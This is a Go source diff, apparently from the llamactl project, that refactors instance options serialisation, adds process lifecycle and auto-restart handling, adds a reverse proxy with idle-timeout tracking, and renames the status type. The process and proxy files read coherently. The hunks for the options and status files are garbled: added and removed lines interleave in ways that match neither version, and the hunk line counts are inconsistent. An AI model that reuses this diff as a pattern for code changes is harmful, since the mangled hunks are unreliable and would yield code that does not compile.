 		BackendType    backends.BackendType `json:"backend_type"`
 		BackendOptions map[string]any       `json:"backend_options,omitempty"`
 		*Alias
 	}{
 		Alias: (*Alias)(c),
@@ -44,113 +102,88 @@ func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
 		return err
 	}
-	// Parse backend-specific options
+	// Convert nodes array to map
-	switch c.BackendType {
+	if len(aux.Nodes) > 0 {
-	case backends.BackendTypeLlamaCpp:
+		c.Nodes = make(map[string]struct{}, len(aux.Nodes))
-		if c.BackendOptions != nil {
+		for _, node := range aux.Nodes {
-			// Convert map to JSON and then unmarshal to LlamaServerOptions
+			c.Nodes[node] = struct{}{}
 			optionsData, err := json.Marshal(c.BackendOptions)
 			if err != nil {
 				return fmt.Errorf("failed to marshal backend options: %w", err)
 			}
 			c.LlamaServerOptions = &llamacpp.LlamaServerOptions{}
 			if err := json.Unmarshal(optionsData, c.LlamaServerOptions); err != nil {
 				return fmt.Errorf("failed to unmarshal llama.cpp options: %w", err)
 			}
 		}
-	case backends.BackendTypeMlxLm:
+	}
 		if c.BackendOptions != nil {
 			optionsData, err := json.Marshal(c.BackendOptions)
 			if err != nil {
 				return fmt.Errorf("failed to marshal backend options: %w", err)
 			}
-			c.MlxServerOptions = &mlx.MlxServerOptions{}
+	// Create backend options struct and unmarshal
-			if err := json.Unmarshal(optionsData, c.MlxServerOptions); err != nil {
+	c.BackendOptions = backends.Options{
-				return fmt.Errorf("failed to unmarshal MLX options: %w", err)
+		BackendType:    aux.BackendType,
-			}
+		BackendOptions: aux.BackendOptions,
-		}
+	}
 	case backends.BackendTypeVllm:
 		if c.BackendOptions != nil {
 			optionsData, err := json.Marshal(c.BackendOptions)
 			if err != nil {
 				return fmt.Errorf("failed to marshal backend options: %w", err)
 			}
-			c.VllmServerOptions = &vllm.VllmServerOptions{}
+	// Marshal the backend options to JSON for proper unmarshaling
-			if err := json.Unmarshal(optionsData, c.VllmServerOptions); err != nil {
+	backendJson, err := json.Marshal(struct {
-				return fmt.Errorf("failed to unmarshal vLLM options: %w", err)
+		BackendType    backends.BackendType `json:"backend_type"`
-			}
+		BackendOptions map[string]any       `json:"backend_options,omitempty"`
-		}
+	}{
-	default:
+		BackendType:    aux.BackendType,
-		return fmt.Errorf("unknown backend type: %s", c.BackendType)
+		BackendOptions: aux.BackendOptions,
 	})
 	if err != nil {
 		return fmt.Errorf("failed to marshal backend options: %w", err)
 	}
 	// Unmarshal into the backends.Options struct to trigger its custom unmarshaling
 	if err := json.Unmarshal(backendJson, &c.BackendOptions); err != nil {
 		return fmt.Errorf("failed to unmarshal backend options: %w", err)
 	}
 	return nil
 }
-// MarshalJSON implements custom JSON marshaling for CreateInstanceOptions
+// MarshalJSON implements custom JSON marshaling for Options
-func (c *CreateInstanceOptions) MarshalJSON() ([]byte, error) {
+func (c *Options) MarshalJSON() ([]byte, error) {
 	// Use anonymous struct to avoid recursion
-	type Alias CreateInstanceOptions
+	type Alias Options
 	aux := struct {
 		Nodes          []string             `json:"nodes,omitempty"` // Output as JSON array
 		BackendType    backends.BackendType `json:"backend_type"`
 		BackendOptions map[string]any       `json:"backend_options,omitempty"`
 		*Alias
 	}{
 		Alias: (*Alias)(c),
 	}
-	// Convert backend-specific options back to BackendOptions map for JSON
+	// Convert nodes map to array (sorted for consistency)
-	switch c.BackendType {
+	if len(c.Nodes) > 0 {
-	case backends.BackendTypeLlamaCpp:
+		aux.Nodes = make([]string, 0, len(c.Nodes))
-		if c.LlamaServerOptions != nil {
+		for node := range c.Nodes {
-			data, err := json.Marshal(c.LlamaServerOptions)
+			aux.Nodes = append(aux.Nodes, node)
 			if err != nil {
 				return nil, fmt.Errorf("failed to marshal llama server options: %w", err)
 			}
 			var backendOpts map[string]any
 			if err := json.Unmarshal(data, &backendOpts); err != nil {
 				return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
 			}
 			aux.BackendOptions = backendOpts
 		}
 	case backends.BackendTypeMlxLm:
 		if c.MlxServerOptions != nil {
 			data, err := json.Marshal(c.MlxServerOptions)
 			if err != nil {
 				return nil, fmt.Errorf("failed to marshal MLX server options: %w", err)
 			}
 			var backendOpts map[string]any
 			if err := json.Unmarshal(data, &backendOpts); err != nil {
 				return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
 			}
 			aux.BackendOptions = backendOpts
 		}
 	case backends.BackendTypeVllm:
 		if c.VllmServerOptions != nil {
 			data, err := json.Marshal(c.VllmServerOptions)
 			if err != nil {
 				return nil, fmt.Errorf("failed to marshal vLLM server options: %w", err)
 			}
 			var backendOpts map[string]any
 			if err := json.Unmarshal(data, &backendOpts); err != nil {
 				return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
 			}
 			aux.BackendOptions = backendOpts
 		}
 		// Sort for consistent output
 		slices.Sort(aux.Nodes)
 	}
 	// Set backend type
 	aux.BackendType = c.BackendOptions.BackendType
 	// Marshal the backends.Options struct to get the properly formatted backend options
 	// Marshal a pointer to trigger the pointer receiver MarshalJSON method
 	backendData, err := json.Marshal(&c.BackendOptions)
 	if err != nil {
 		return nil, fmt.Errorf("failed to marshal backend options: %w", err)
 	}
 	// Unmarshal into a temporary struct to extract the backend_options map
 	var tempBackend struct {
 		BackendOptions map[string]any `json:"backend_options,omitempty"`
 	}
 	if err := json.Unmarshal(backendData, &tempBackend); err != nil {
 		return nil, fmt.Errorf("failed to unmarshal backend data: %w", err)
 	}
 	aux.BackendOptions = tempBackend.BackendOptions
 	return json.Marshal(aux)
 }
-// ValidateAndApplyDefaults validates the instance options and applies constraints
+// validateAndApplyDefaults validates the instance options and applies constraints
-func (c *CreateInstanceOptions) ValidateAndApplyDefaults(name string, globalSettings *config.InstancesConfig) {
+func (c *Options) validateAndApplyDefaults(name string, globalSettings *config.InstancesConfig) {
 	// Validate and apply constraints
 	if c.MaxRestarts != nil && *c.MaxRestarts < 0 {
 		log.Printf("Instance %s MaxRestarts value (%d) cannot be negative, setting to 0", name, *c.MaxRestarts)
@@ -187,25 +220,3 @@ func (c *CreateInstanceOptions) ValidateAndApplyDefaults(name string, globalSett
 		}
 	}
 }
 // BuildCommandArgs returns the command line arguments for the configured
 // backend type. For vLLM the arguments are prefixed with "serve". An empty
 // slice is returned when the backend type is not handled or its options are nil.
 func (c *CreateInstanceOptions) BuildCommandArgs() []string {
 	switch c.BackendType {
 	case backends.BackendTypeLlamaCpp:
 		if llama := c.LlamaServerOptions; llama != nil {
 			return llama.BuildCommandArgs()
 		}
 	case backends.BackendTypeMlxLm:
 		if mlxOpts := c.MlxServerOptions; mlxOpts != nil {
 			return mlxOpts.BuildCommandArgs()
 		}
 	case backends.BackendTypeVllm:
 		if vllmOpts := c.VllmServerOptions; vllmOpts != nil {
 			// "serve" goes first, followed by the vLLM arguments.
 			return append([]string{"serve"}, vllmOpts.BuildCommandArgs()...)
 		}
 	}
 	return []string{}
 }
--- a/pkg/instance/process.go
+++ b/pkg/instance/process.go
@@ -0,0 +1,413 @@
 package instance
 import (
 	"context"
 	"fmt"
 	"io"
 	"log"
 	"net/http"
 	"os"
 	"os/exec"
 	"runtime"
 	"sync"
 	"syscall"
 	"time"
 )
 // process manages the OS process lifecycle for a local instance.
 // process owns its complete lifecycle including auto-restart logic.
 type process struct {
 	instance *Instance // Back-reference for SetStatus, GetOptions
 	// mu guards the mutable fields below.
 	mu            sync.RWMutex
 	// cmd is the command built by buildCommand and launched by start.
 	cmd           *exec.Cmd
 	// ctx and cancel are created on every start; ctx is handed to exec.CommandContext.
 	ctx           context.Context
 	cancel        context.CancelFunc
 	// stdout and stderr are the pipes of cmd that are fed to the instance logger.
 	stdout        io.ReadCloser
 	stderr        io.ReadCloser
 	// restarts counts auto-restart attempts; it is reset on a manual start or restart.
 	restarts      int
 	// restartCancel is set while an auto-restart delay is pending and cancels that delay.
 	restartCancel context.CancelFunc
 	// monitorDone is created by start and closed when monitorProcess finishes.
 	monitorDone   chan struct{}
 }
 // newProcess returns a process component bound to the given instance.
 // No OS process is started until start is called.
 func newProcess(instance *Instance) *process {
 	p := new(process)
 	p.instance = instance
 	return p
 }
 // start launches the OS process for the instance.
 //
 // It fails if the instance is already running or has no options. On success
 // the instance status is set to Running and three goroutines are spawned:
 // two that forward stdout/stderr to the instance logger and one that
 // monitors the process for exit.
 //
 // On any failure after the context has been created, the context is
 // cancelled; log files that were opened are closed as well, so a failed
 // start does not leak resources.
 func (p *process) start() error {
 	p.mu.Lock()
 	defer p.mu.Unlock()
 	if p.instance.IsRunning() {
 		return fmt.Errorf("instance %s is already running", p.instance.Name)
 	}
 	// Safety check: ensure options are valid
 	if p.instance.options == nil {
 		return fmt.Errorf("instance %s has no options set", p.instance.Name)
 	}
 	// Reset restart counter when manually starting (not during auto-restart).
 	// restartCancel is only set while an auto-restart is pending.
 	if p.restartCancel == nil {
 		p.restarts = 0
 	}
 	// Initialize last request time to current time when starting
 	if p.instance.proxy != nil {
 		p.instance.proxy.updateLastRequestTime()
 	}
 	// Create context before building command (needed for CommandContext)
 	p.ctx, p.cancel = context.WithCancel(context.Background())
 	// Release the context again unless the process actually started.
 	// This runs before the deferred unlock, i.e. still under p.mu.
 	started := false
 	defer func() {
 		if !started {
 			p.cancel()
 		}
 	}()
 	// Create log files
 	if err := p.instance.logger.create(); err != nil {
 		return fmt.Errorf("failed to create log files: %w", err)
 	}
 	// Build command using backend-specific methods
 	cmd, cmdErr := p.buildCommand()
 	if cmdErr != nil {
 		p.instance.logger.close()
 		return fmt.Errorf("failed to build command: %w", cmdErr)
 	}
 	p.cmd = cmd
 	if runtime.GOOS != "windows" {
 		setProcAttrs(p.cmd)
 	}
 	var err error
 	p.stdout, err = p.cmd.StdoutPipe()
 	if err != nil {
 		p.instance.logger.close()
 		return fmt.Errorf("failed to get stdout pipe: %w", err)
 	}
 	p.stderr, err = p.cmd.StderrPipe()
 	if err != nil {
 		p.stdout.Close()
 		p.instance.logger.close()
 		return fmt.Errorf("failed to get stderr pipe: %w", err)
 	}
 	if err := p.cmd.Start(); err != nil {
 		// The log files were opened above; do not leave them open for a process that never ran
 		p.instance.logger.close()
 		return fmt.Errorf("failed to start instance %s: %w", p.instance.Name, err)
 	}
 	started = true
 	p.instance.SetStatus(Running)
 	// Create channel for monitor completion signaling
 	p.monitorDone = make(chan struct{})
 	go p.instance.logger.readOutput(p.stdout)
 	go p.instance.logger.readOutput(p.stderr)
 	go p.monitorProcess()
 	return nil
 }
 // stop terminates the subprocess without restarting.
 //
 // If the instance is not running, any pending auto-restart is cancelled and
 // an "is not running" error is returned. Otherwise the status is set to
 // Stopped, SIGINT is sent to the process, and stop waits up to 30 seconds
 // for the monitor goroutine to report the exit before force-killing the
 // process. The instance logger is closed before returning nil.
 func (p *process) stop() error {
 	p.mu.Lock()
 	if !p.instance.IsRunning() {
 		// Even if not running, cancel any pending restart
 		if p.restartCancel != nil {
 			p.restartCancel()
 			p.restartCancel = nil
 			log.Printf("Cancelled pending restart for instance %s", p.instance.Name)
 		}
 		p.mu.Unlock()
 		return fmt.Errorf("instance %s is not running", p.instance.Name)
 	}
 	// Cancel any pending restart
 	if p.restartCancel != nil {
 		p.restartCancel()
 		p.restartCancel = nil
 	}
 	// Set status to stopped first to signal intentional stop
 	// (monitorProcess checks IsRunning to tell a requested stop from a crash)
 	p.instance.SetStatus(Stopped)
 	// Get the monitor done channel before releasing the lock
 	monitorDone := p.monitorDone
 	p.mu.Unlock()
 	// Stop the process with SIGINT if cmd exists
 	// NOTE(review): p.cmd is read here without holding p.mu
 	if p.cmd != nil && p.cmd.Process != nil {
 		if err := p.cmd.Process.Signal(syscall.SIGINT); err != nil {
 			log.Printf("Failed to send SIGINT to instance %s: %v", p.instance.Name, err)
 		}
 	}
 	// If no process exists, we can return immediately
 	if p.cmd == nil || monitorDone == nil {
 		p.instance.logger.close()
 		return nil
 	}
 	// Wait for the monitor goroutine to observe the exit
 	select {
 	case <-monitorDone:
 		// Process exited normally
 	case <-time.After(30 * time.Second):
 		// Force kill if it doesn't exit within 30 seconds
 		if p.cmd != nil && p.cmd.Process != nil {
 			killErr := p.cmd.Process.Kill()
 			if killErr != nil {
 				log.Printf("Failed to force kill instance %s: %v", p.instance.Name, killErr)
 			}
 			// Logged even when Kill returned an error
 			log.Printf("Instance %s did not stop in time, force killed", p.instance.Name)
 			// Wait a bit more for the monitor to finish after force kill
 			select {
 			case <-monitorDone:
 				// Monitor completed after force kill
 			case <-time.After(2 * time.Second):
 				log.Printf("Warning: Monitor goroutine did not complete after force kill for instance %s", p.instance.Name)
 			}
 		}
 	}
 	p.instance.logger.close()
 	return nil
 }
 // restart performs a manual restart: it stops the process, zeroes the
 // auto-restart counter and starts the process again. A stop error that only
 // reports the instance was not running is ignored; any other stop error
 // aborts the restart.
 func (p *process) restart() error {
 	stopErr := p.stop()
 	if stopErr != nil {
 		// "not running" is fine here, we are about to start it anyway
 		notRunning := fmt.Sprintf("instance %s is not running", p.instance.Name)
 		if stopErr.Error() != notRunning {
 			return fmt.Errorf("failed to stop instance during restart: %w", stopErr)
 		}
 	}
 	// A manual restart always begins with a fresh restart counter
 	func() {
 		p.mu.Lock()
 		defer p.mu.Unlock()
 		p.restarts = 0
 	}()
 	return p.start()
 }
 // waitForHealthy blocks until the instance answers GET /health with 200 OK
 // or the timeout (in seconds) elapses. A non-positive timeout falls back to
 // 30 seconds. The first probe is made immediately; after that the endpoint
 // is polled once per second. Returns an error if the instance is not
 // running or the deadline passes first.
 func (p *process) waitForHealthy(timeout int) error {
 	if !p.instance.IsRunning() {
 		return fmt.Errorf("instance %s is not running", p.instance.Name)
 	}
 	if timeout <= 0 {
 		timeout = 30 // Default to 30 seconds if no timeout is specified
 	}
 	limit := time.Duration(timeout) * time.Second
 	ctx, cancel := context.WithTimeout(context.Background(), limit)
 	defer cancel()
 	// Health endpoint is derived from the instance's host/port
 	host := p.instance.options.GetHost()
 	port := p.instance.options.GetPort()
 	healthURL := fmt.Sprintf("http://%s:%d/health", host, port)
 	// Dedicated client so every single request is capped at 5 seconds
 	client := &http.Client{Timeout: 5 * time.Second}
 	// probe reports whether one health request returned 200 OK
 	probe := func() bool {
 		req, reqErr := http.NewRequestWithContext(ctx, http.MethodGet, healthURL, nil)
 		if reqErr != nil {
 			return false
 		}
 		resp, doErr := client.Do(req)
 		if doErr != nil {
 			return false
 		}
 		healthy := resp.StatusCode == http.StatusOK
 		resp.Body.Close()
 		return healthy
 	}
 	// Fast path: already healthy
 	if probe() {
 		return nil
 	}
 	// Otherwise poll until healthy or out of time
 	ticker := time.NewTicker(1 * time.Second)
 	defer ticker.Stop()
 	for {
 		select {
 		case <-ticker.C:
 			if probe() {
 				return nil
 			}
 		case <-ctx.Done():
 			return fmt.Errorf("timeout waiting for instance %s to become healthy after %d seconds", p.instance.Name, timeout)
 		}
 	}
 }
 // monitorProcess waits for the OS process to exit and handles the result.
 //
 // If the instance is no longer marked running when the process exits, the
 // exit was requested (see stop) and nothing else is done. Otherwise the
 // status is set to Stopped, the logger is closed, and a non-nil exit error
 // is handed to handleAutoRestart.
 //
 // The command and the completion channel are snapshotted when the monitor
 // starts. handleAutoRestart may call start, which installs a new
 // p.monitorDone for the next monitor goroutine; this monitor must close its
 // own channel only, and must not clear the field if it already belongs to
 // its successor.
 func (p *process) monitorProcess() {
 	// Blocks until start releases p.mu, then pins this run's cmd and channel
 	p.mu.RLock()
 	cmd := p.cmd
 	done := p.monitorDone
 	p.mu.RUnlock()
 	defer func() {
 		p.mu.Lock()
 		if done != nil {
 			close(done)
 			// Only clear the field if it still refers to our channel
 			if p.monitorDone == done {
 				p.monitorDone = nil
 			}
 		}
 		p.mu.Unlock()
 	}()
 	err := cmd.Wait()
 	p.mu.Lock()
 	// Check if the instance was intentionally stopped
 	if !p.instance.IsRunning() {
 		p.mu.Unlock()
 		return
 	}
 	p.instance.SetStatus(Stopped)
 	p.instance.logger.close()
 	// Cancel any existing restart context since we're handling a new exit
 	if p.restartCancel != nil {
 		p.restartCancel()
 		p.restartCancel = nil
 	}
 	// Log the exit
 	if err != nil {
 		log.Printf("Instance %s crashed with error: %v", p.instance.Name, err)
 		// Handle auto-restart logic; handleAutoRestart releases p.mu on every path
 		p.handleAutoRestart(err)
 	} else {
 		log.Printf("Instance %s exited cleanly", p.instance.Name)
 		p.mu.Unlock()
 	}
 }
 // shouldAutoRestart reports whether a crashed process may be restarted
 // automatically. It requires options to be present, AutoRestart to be
 // enabled, MaxRestarts to be set, and the restart counter to be below
 // MaxRestarts. The reason for a refusal is logged.
 func (p *process) shouldAutoRestart() bool {
 	opts := p.instance.GetOptions()
 	switch {
 	case opts == nil:
 		log.Printf("Instance %s not restarting: options are nil", p.instance.Name)
 		return false
 	case opts.AutoRestart == nil || !*opts.AutoRestart:
 		log.Printf("Instance %s not restarting: AutoRestart is disabled", p.instance.Name)
 		return false
 	case opts.MaxRestarts == nil:
 		log.Printf("Instance %s not restarting: MaxRestarts is nil", p.instance.Name)
 		return false
 	case p.restarts >= *opts.MaxRestarts:
 		log.Printf("Instance %s exceeded max restart attempts (%d)", p.instance.Name, *opts.MaxRestarts)
 		return false
 	}
 	return true
 }
 // handleAutoRestart decides whether a crashed process is restarted and, if
 // so, performs the restart after the configured delay.
 //
 // It must be called with p.mu held and releases the lock on every path.
 // The err parameter is the process exit error; it is not used here (the
 // caller logs it).
 //
 // When no restart is allowed, or the restart attempt itself fails, the
 // instance is marked Failed. The pending delay can be cancelled through
 // p.restartCancel (see stop), in which case no restart happens.
 func (p *process) handleAutoRestart(err error) {
 	// Check if should restart
 	if !p.shouldAutoRestart() {
 		p.instance.SetStatus(Failed)
 		p.mu.Unlock()
 		return
 	}
 	// Get restart parameters
 	opts := p.instance.GetOptions()
 	if opts.RestartDelay == nil {
 		log.Printf("Instance %s not restarting: RestartDelay is nil", p.instance.Name)
 		p.instance.SetStatus(Failed)
 		p.mu.Unlock()
 		return
 	}
 	restartDelay := *opts.RestartDelay
 	maxRestarts := *opts.MaxRestarts
 	p.restarts++
 	// Set status to Restarting instead of leaving as Stopped
 	p.instance.SetStatus(Restarting)
 	log.Printf("Auto-restarting instance %s (attempt %d/%d) in %v",
 		p.instance.Name, p.restarts, maxRestarts, time.Duration(restartDelay)*time.Second)
 	// Create a cancellable context for the restart delay
 	restartCtx, cancel := context.WithCancel(context.Background())
 	p.restartCancel = cancel
 	// Release the lock before sleeping
 	p.mu.Unlock()
 	// Always release the context, whichever way this function exits
 	defer cancel()
 	// Stoppable timer so a cancelled restart does not leave a timer behind
 	delay := time.NewTimer(time.Duration(restartDelay) * time.Second)
 	defer delay.Stop()
 	select {
 	case <-delay.C:
 		// Sleep completed normally, continue with restart
 	case <-restartCtx.Done():
 		// Restart was cancelled
 		log.Printf("Restart cancelled for instance %s", p.instance.Name)
 		return
 	}
 	// select picks at random when both channels are ready; honour a cancellation that raced with the timer
 	if restartCtx.Err() != nil {
 		log.Printf("Restart cancelled for instance %s", p.instance.Name)
 		return
 	}
 	// Restart the instance
 	startErr := p.start()
 	if startErr != nil {
 		log.Printf("Failed to restart instance %s: %v", p.instance.Name, startErr)
 	} else {
 		log.Printf("Successfully restarted instance %s", p.instance.Name)
 	}
 	p.mu.Lock()
 	// The restart attempt is over either way, so nothing is pending any more
 	p.restartCancel = nil
 	// Do not leave the instance stuck in Restarting after a failed attempt.
 	// Skip this if it is running (e.g. it was started manually during the delay).
 	if startErr != nil && !p.instance.IsRunning() {
 		p.instance.SetStatus(Failed)
 	}
 	p.mu.Unlock()
 }
 // buildCommand assembles the exec.Cmd for the instance's backend. The
 // command is bound to p.ctx, inherits the host environment, and has the
 // backend-specific variables appended after it. The returned error is
 // always nil.
 func (p *process) buildCommand() (*exec.Cmd, error) {
 	inst := p.instance
 	// Backend-specific pieces: environment, executable, arguments
 	backendEnv := inst.buildEnvironment()
 	executable := inst.getCommand()
 	arguments := inst.buildCommandArgs()
 	cmd := exec.CommandContext(p.ctx, executable, arguments...)
 	// Host environment first, backend variables appended afterwards
 	environ := os.Environ()
 	for key, value := range backendEnv {
 		environ = append(environ, fmt.Sprintf("%s=%s", key, value))
 	}
 	cmd.Env = environ
 	return cmd, nil
 }
--- a/pkg/instance/proxy.go
+++ b/pkg/instance/proxy.go
@@ -0,0 +1,201 @@
 package instance
 import (
 	"fmt"
 	"net/http"
 	"net/http/httputil"
 	"net/url"
 	"sync"
 	"sync/atomic"
 	"time"
 )
 // TimeProvider abstracts the clock so tests can substitute a mock time source.
 type TimeProvider interface {
 	// Now returns the current time according to this provider.
 	Now() time.Time
 }
 // realTimeProvider implements TimeProvider using the actual system time.
 type realTimeProvider struct{}
 // Now returns time.Now().
 func (realTimeProvider) Now() time.Time {
 	return time.Now()
 }
 // proxy manages HTTP reverse proxy and request tracking for an instance.
 type proxy struct {
 	// instance is the owning instance.
 	instance *Instance
 	// targetURL is the backend address requests are forwarded to; set by newProxy.
 	targetURL *url.URL
 	apiKey    string // For remote instances
 	// responseHeaders are set on every proxied response of a local instance.
 	responseHeaders map[string]string
 	// mu is taken by clear when the cached reverse proxy is reset.
 	mu sync.RWMutex
 	// proxy, proxyOnce and proxyErr cache the lazily built reverse proxy (see get).
 	proxy     *httputil.ReverseProxy
 	proxyOnce sync.Once
 	proxyErr  error
 	// lastRequestTime is the Unix timestamp (seconds) of the last proxied request.
 	lastRequestTime atomic.Int64
 	// timeProvider is the clock used for lastRequestTime and idle-timeout checks.
 	timeProvider    TimeProvider
 }
 // newProxy builds the proxy state for an instance.
 //
 // For a remote instance the target is the address of the first node found
 // in the instance options, and that node's API key is stored. For a local
 // instance the target is http://host:port taken from the instance options,
 // and the backend's response headers are stored. An error is returned when
 // options are missing, no usable node/port exists, or the URL cannot be
 // parsed.
 func newProxy(instance *Instance) (*proxy, error) {
 	p := &proxy{
 		instance:     instance,
 		timeProvider: realTimeProvider{},
 	}
 	options := instance.GetOptions()
 	if options == nil {
 		return nil, fmt.Errorf("instance %s has no options set", instance.Name)
 	}
 	if !instance.IsRemote() {
 		// Local instance: forward to the process' own host/port
 		host := p.instance.options.GetHost()
 		port := p.instance.options.GetPort()
 		if port == 0 {
 			return nil, fmt.Errorf("instance %s has no port assigned", p.instance.Name)
 		}
 		target, parseErr := url.Parse(fmt.Sprintf("http://%s:%d", host, port))
 		if parseErr != nil {
 			return nil, fmt.Errorf("failed to parse target URL for instance %s: %w", p.instance.Name, parseErr)
 		}
 		p.targetURL = target
 		// Response headers come from the backend configuration
 		p.responseHeaders = options.BackendOptions.GetResponseHeaders(p.instance.globalBackendSettings)
 		return p, nil
 	}
 	// Remote instance: take the first remote node as the target for now
 	var nodeName string
 	for candidate := range options.Nodes {
 		nodeName = candidate
 		break
 	}
 	if nodeName == "" {
 		return nil, fmt.Errorf("instance %s has no remote nodes defined", p.instance.Name)
 	}
 	node, known := p.instance.globalNodesConfig[nodeName]
 	if !known {
 		return nil, fmt.Errorf("remote node %s is not defined", nodeName)
 	}
 	target, parseErr := url.Parse(node.Address)
 	if parseErr != nil {
 		return nil, fmt.Errorf("failed to parse target URL for remote instance %s: %w", p.instance.Name, parseErr)
 	}
 	p.targetURL = target
 	p.apiKey = node.APIKey
 	return p, nil
 }
 // get returns the reverse proxy for this instance, creating it if needed.
 //
 // sync.Once guarantees build is called at most once per Once value; callers
 // arriving during the first build block until it completes. The read lock
 // is held for the whole call because clear replaces proxyOnce and resets
 // proxy/proxyErr under the write lock; without it a concurrent clear would
 // race with the reads and with the Once itself.
 func (p *proxy) get() (*httputil.ReverseProxy, error) {
 	p.mu.RLock()
 	defer p.mu.RUnlock()
 	p.proxyOnce.Do(func() {
 		p.proxy, p.proxyErr = p.build()
 	})
 	return p.proxy, p.proxyErr
 }
 // build constructs the single-host reverse proxy for p.targetURL.
 //
 // Outgoing requests record the last request time and, for remote instances
 // with an API key, carry a Bearer Authorization header. Responses of local
 // instances have their CORS headers removed and the configured response
 // headers applied. The returned error is always nil.
 func (p *proxy) build() (*httputil.ReverseProxy, error) {
 	rp := httputil.NewSingleHostReverseProxy(p.targetURL)
 	// Wrap the default director to adjust the request before it is sent to the backend
 	defaultDirector := rp.Director
 	rp.Director = func(req *http.Request) {
 		defaultDirector(req)
 		// Add API key header for remote instances
 		if p.instance.IsRemote() && p.apiKey != "" {
 			req.Header.Set("Authorization", "Bearer "+p.apiKey)
 		}
 		// Update last request time
 		p.updateLastRequestTime()
 	}
 	if p.instance.IsRemote() {
 		return rp, nil
 	}
 	// Local instances only: rewrite headers on the backend response
 	rp.ModifyResponse = func(resp *http.Response) error {
 		// Remove CORS headers from backend response to avoid conflicts;
 		// llamactl will add its own CORS headers
 		backendCORS := []string{
 			"Access-Control-Allow-Origin",
 			"Access-Control-Allow-Methods",
 			"Access-Control-Allow-Headers",
 			"Access-Control-Allow-Credentials",
 			"Access-Control-Max-Age",
 			"Access-Control-Expose-Headers",
 		}
 		for _, name := range backendCORS {
 			resp.Header.Del(name)
 		}
 		// Apply the configured custom response headers
 		for name, value := range p.responseHeaders {
 			resp.Header.Set(name, value)
 		}
 		return nil
 	}
 	return rp, nil
 }
 // clear resets the cached reverse proxy and its error, and replaces the
 // sync.Once so the next get call builds the proxy again. The reset happens
 // under the write lock of p.mu.
 func (p *proxy) clear() {
 	p.mu.Lock()
 	defer p.mu.Unlock()
 	p.proxy = nil
 	p.proxyErr = nil
 	p.proxyOnce = sync.Once{} // Fresh Once so the next get call rebuilds the proxy
 }
 // updateLastRequestTime records the time provider's current time, as a
 // Unix timestamp in seconds, as the instance's last request time.
 func (p *proxy) updateLastRequestTime() {
 	p.lastRequestTime.Store(p.timeProvider.Now().Unix())
 }
 // getLastRequestTime returns the stored last request time as a Unix
 // timestamp in seconds.
 func (p *proxy) getLastRequestTime() int64 {
 	last := p.lastRequestTime.Load()
 	return last
 }
 // shouldTimeout reports whether a running instance has been idle for longer
 // than its IdleTimeout (given in minutes). It returns false when the
 // instance is not running, has no options, or has no positive IdleTimeout.
 func (p *proxy) shouldTimeout() bool {
 	if !p.instance.IsRunning() {
 		return false
 	}
 	options := p.instance.GetOptions()
 	if options == nil || options.IdleTimeout == nil {
 		return false
 	}
 	if *options.IdleTimeout <= 0 {
 		return false
 	}
 	lastRequest := p.lastRequestTime.Load()
 	// IdleTimeout is in minutes, timestamps are in seconds
 	limitSeconds := int64(*options.IdleTimeout * 60)
 	idleSeconds := p.timeProvider.Now().Unix() - lastRequest
 	return idleSeconds > limitSeconds
 }
 // setTimeProvider replaces the clock used by this proxy; intended for tests.
 // NOTE(review): the field is assigned without synchronization.
 func (p *proxy) setTimeProvider(tp TimeProvider) {
 	p.timeProvider = tp
 }
--- a/pkg/instance/status.go
+++ b/pkg/instance/status.go
@@ -3,48 +3,35 @@ package instance
 import (
 	"encoding/json"
 	"log"
 	"sync"
 )
-// Enum for instance status
+// Status is the enum for status values (exported).
-type InstanceStatus int
+type Status int
 const (
-	Stopped InstanceStatus = iota
+	Stopped Status = iota
 	Running
 	Failed
 	Restarting
 )
-var nameToStatus = map[string]InstanceStatus{
+var nameToStatus = map[string]Status{
-	"stopped": Stopped,
+	"stopped":    Stopped,
-	"running": Running,
+	"running":    Running,
-	"failed":  Failed,
+	"failed":     Failed,
 	"restarting": Restarting,
 }
-var statusToName = map[InstanceStatus]string{
+var statusToName = map[Status]string{
-	Stopped: "stopped",
+	Stopped:    "stopped",
-	Running: "running",
+	Running:    "running",
-	Failed:  "failed",
+	Failed:     "failed",
 	Restarting: "restarting",
 }
-func (p *Process) SetStatus(status InstanceStatus) {
+// Status enum JSON marshaling methods
-	oldStatus := p.Status
+func (s Status) MarshalJSON() ([]byte, error) {
 	p.Status = status
 	if p.onStatusChange != nil {
 		p.onStatusChange(oldStatus, status)
 	}
 }
 func (p *Process) GetStatus() InstanceStatus {
 	return p.Status
 }
 // IsRunning returns true if the status is Running
 func (p *Process) IsRunning() bool {
 	return p.Status == Running
 }
 func (s InstanceStatus) MarshalJSON() ([]byte, error) {
 	name, ok := statusToName[s]
 	if !ok {
 		name = "stopped" // Default to "stopped" for unknown status
@@ -52,8 +39,8 @@ func (s InstanceStatus) MarshalJSON() ([]byte, error) {
 	return json.Marshal(name)
 }
-// UnmarshalJSON implements json.Unmarshaler
+// UnmarshalJSON implements json.Unmarshaler for Status enum
-func (s *InstanceStatus) UnmarshalJSON(data []byte) error {
+func (s *Status) UnmarshalJSON(data []byte) error {
 	var str string
 	if err := json.Unmarshal(data, &str); err != nil {
 		return err
@@ -68,3 +55,61 @@ func (s *InstanceStatus) UnmarshalJSON(data []byte) error {
 	*s = status
 	return nil
 }
 // status wraps a Status value behind a read/write mutex so it can be read
 // and updated from multiple goroutines (unexported).
 type status struct {
 	mu sync.RWMutex
 	s  Status
 	// onStatusChange, when non-nil, is invoked after every set call
 	onStatusChange func(oldStatus, newStatus Status)
 }
 // newStatus returns a status wrapper holding the given initial value.
 func newStatus(initial Status) *status {
 	st := new(status)
 	st.s = initial
 	return st
 }
 // get returns the current status.
 func (st *status) get() Status {
 	st.mu.RLock()
 	current := st.s
 	st.mu.RUnlock()
 	return current
 }
 // set stores newStatus and then invokes onStatusChange, if one is set,
 // with the previous and the new value.
 func (st *status) set(newStatus Status) {
 	st.mu.Lock()
 	previous, notify := st.s, st.onStatusChange
 	st.s = newStatus
 	st.mu.Unlock()
 	// The callback runs outside the lock to avoid potential deadlocks
 	if notify == nil {
 		return
 	}
 	notify(previous, newStatus)
 }
 // isRunning reports whether the current status is Running.
 func (st *status) isRunning() bool {
 	return st.get() == Running
 }
 // MarshalJSON implements json.Marshaler by encoding the wrapped Status.
 func (st *status) MarshalJSON() ([]byte, error) {
 	return st.get().MarshalJSON()
 }
 // UnmarshalJSON implements json.Unmarshaler by decoding into the wrapped
